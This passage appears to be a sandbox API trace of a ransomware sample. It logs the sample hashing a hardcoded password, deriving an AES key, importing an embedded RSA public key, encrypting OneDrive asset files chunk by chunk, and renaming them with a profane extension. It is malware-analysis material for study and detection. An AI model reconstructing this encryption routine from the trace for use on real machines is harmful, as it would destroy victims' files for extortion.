dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f285c8) returned 1 [0272.110] CryptImportPublicKeyInfo (in: hCryptProv=0x2f285c8, dwCertEncodingType=0x1, pInfo=0x2f32360*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32390*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32398*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fab88) returned 1 [0272.110] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0272.110] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f28a08*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f28a08*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0272.110] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f28a08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f28a08*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0272.111] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.170] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.170] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.186] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.186] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.186] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.186] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.186] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.186] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.186] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.186] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.187] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.187] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.252] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.253] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.253] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.253] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.253] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.253] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.254] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.254] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.254] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.254] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.254] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.254] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x196, lpOverlapped=0x0) returned 1 [0272.254] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x196, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x1a0) returned 1 [0272.254] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x1a0, lpOverlapped=0x0) returned 1 [0272.254] CloseHandle (hObject=0x5d4c) returned 1 [0272.254] CloseHandle (hObject=0x5d3c) returned 1 [0272.255] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorBlue.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorblue.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorBlue.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorblue.png"), bFailIfExists=0) returned 1 [0272.258] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorBlue.png", dwFileAttributes=0x0) returned 1 [0272.258] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorBlue.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorblue.png.gsg")) returned 1 [0272.259] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorBlue.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorblue.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorBlue.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorblue.png.fuck")) returned 1 [0272.261] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0272.261] CryptDestroyKey (hKey=0x2fa6c8) returned 1 [0272.261] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0272.261] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0272.261] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0272.261] GetLastError () returned 0x0 [0272.261] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorWhite.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorwhite.png")) returned 0x20 [0272.261] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorWhite.png", dwFileAttributes=0x80) returned 1 [0272.262] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorWhite.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorwhite.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0272.263] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorWhite.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorwhite.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0272.264] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorWhite.png.gsg", dwFileAttributes=0x2) returned 1 [0272.264] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0272.267] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0272.267] lstrlenA (lpString="aECpWcPppDlAmtrTSptkyOWgzMlQm") returned 29 [0272.267] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0272.267] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa748) returned 1 [0272.267] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0272.267] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0272.267] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f28a90) returned 1 [0272.268] CryptImportPublicKeyInfo (in: hCryptProv=0x2f28a90, dwCertEncodingType=0x1, pInfo=0x2f32d20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32d50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32d58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fb088) returned 1 [0272.268] CryptEncrypt (in: hKey=0x2fb088, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0272.269] CryptEncrypt (in: hKey=0x2fb088, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f28b18*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f28b18*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0272.269] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f28b18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f28b18*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0272.270] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.337] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.337] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.339] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.339] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.339] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.339] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.339] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.339] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.339] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.339] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.339] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.339] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.389] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.389] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.390] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.390] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.390] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.390] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.390] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.390] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.390] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.390] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.390] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.390] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.390] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.390] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.390] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0xe2, lpOverlapped=0x0) returned 1 [0272.391] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xe2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xf0) returned 1 [0272.391] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0xf0, lpOverlapped=0x0) returned 1 [0272.391] CloseHandle (hObject=0x5d3c) returned 1 [0272.391] CloseHandle (hObject=0x5d4c) returned 1 [0272.391] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorWhite.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorwhite.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorWhite.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorwhite.png"), bFailIfExists=0) returned 1 [0272.395] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorWhite.png", dwFileAttributes=0x0) returned 1 [0272.395] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorWhite.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorwhite.png.gsg")) returned 1 [0272.397] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorWhite.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorwhite.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppErrorWhite.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\apperrorwhite.png.fuck")) returned 1 [0272.398] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0272.398] CryptDestroyKey (hKey=0x2fa748) returned 1 [0272.398] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0272.398] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0272.398] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0272.399] GetLastError () returned 0x0 [0272.399] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppWhite.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appwhite.png")) returned 0x20 [0272.400] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppWhite.png", dwFileAttributes=0x80) returned 1 [0272.400] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppWhite.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appwhite.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0272.401] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AppWhite.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\appwhite.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0272.402] SetFileAttributesA 